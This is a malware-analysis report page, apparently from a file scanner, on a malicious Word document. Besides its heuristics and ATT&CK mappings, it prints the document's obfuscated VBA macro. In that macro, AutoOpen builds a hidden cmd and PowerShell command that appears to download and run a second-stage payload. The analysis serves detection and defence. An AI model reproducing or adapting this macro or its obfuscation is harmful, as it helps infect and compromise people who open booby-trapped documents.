MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a shell command, likely to download and run a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of its exact behavior or destination.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11627 bytes |
SHA-256: 4aff0af47a58af25e460d8d25bae9ee1f7a1301bb4f1f495a867249d0008562b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qObMCbz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const IXPzQbsjcKO = 0
Dim hwzHPr(5)
hwzHPr(0) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
hwzHPr(1) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
hwzHPr(2) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Left(DUAUwXz, 196)
hwzHPr(3) = Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969)
hwzHPr(4) = Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969)
Dim Fnkcd(2)
Fnkcd(0) = Left(DUAUwXz, 196) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
Fnkcd(1) = MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969)
Dim jBdVf(2)
jBdVf(0) = MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
jBdVf(1) = Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200, 969)
Dim NiwBjp(4)
NiwBjp(0) = Left(DUAUwXz, 196) + Left(DUAUwXz, 196)
NiwBjp(1) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
NiwBjp(2) = Right(ttcqN, 266) + Left(DUAUwXz, 196) + Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429)
NiwBjp(3) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
Dim ZWAKlH(2)
ZWAKlH(0) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
ZWAKlH(1) = Right(ttcqN, 266) + Right(ttcqN, 266) + Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969)
Shell@ vHSAvTouvRW + AnnGNBonG + sLjwfHYw + JpVWGpBXz, IXPzQbsjcKO
Dim jtpjwJ(4)
jtpjwJ(0) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266)
jtpjwJ(1) = MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429)
jtpjwJ(2) = MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
jtpjwJ(3) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
Dim voznIz(3)
voznIz(0) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
voznIz(1) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
voznIz(2) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
End Sub
Attribute VB_Name = "qhXZFCbCEEzt"
Function vHSAvTouvRW()
Dim wdPQj(5)
wdPQj(0) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
wdPQj(1) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
wdPQj(2) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
wdPQj(3) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
wdPQj(4) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
ErClKuBCiAn = CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "m" + "d /V^:^O" + "N/" + CStr(Chr(CleanString(4 + 4 + 1 + 10 + 48))) + CStr(Chr(CleanString(2 + 2 + 0 + 4 + 26))) + "^s" + "e^t ^7" + "d= ^ ^ ^" + " ^ ^ ^ ^ " + " " + "}}{^h" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "t^"
Dim cSPQB(2)
cSPQB(0) = Right(ttcqN, 266) + Right(ttcqN, 266)
cSPQB(1) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Left(DUAUwXz, 196) + Right(ttcqN, 266)
BIukj = "a" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "}^;^ka^erb" + "^;^b^iK$^ ^m" + "e^t^" + "I^-" + "^e^k^ovn" + "^I^;)b^i" + "^K^$ ,v^i^i$" + "(^el^i^Fdao" + "^ln^woD^." + CStr(Chr(CleanString(4 + 4 + 1 + 10 + 48))) + "LJ^${yr^t" + "{)" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "TY$ n^i" + "^ v^i^i^$(^" + "h" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "a^"
Dim pawzlF(5)
pawzlF(0) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
pawzlF(1) = Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969)
pawzlF(2) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
pawzlF(3) = Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
pawzlF(4) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
Dim JsazwC(2)
JsazwC(0) = Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969) + Right(ttcqN, 266)
JsazwC(1) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
Dim vjTCX(4)
vjTCX(0) = MidB(GfXpUG, 200, 969) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429)
vjTCX(1) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
vjTCX(2) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
vjTCX(3) = Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.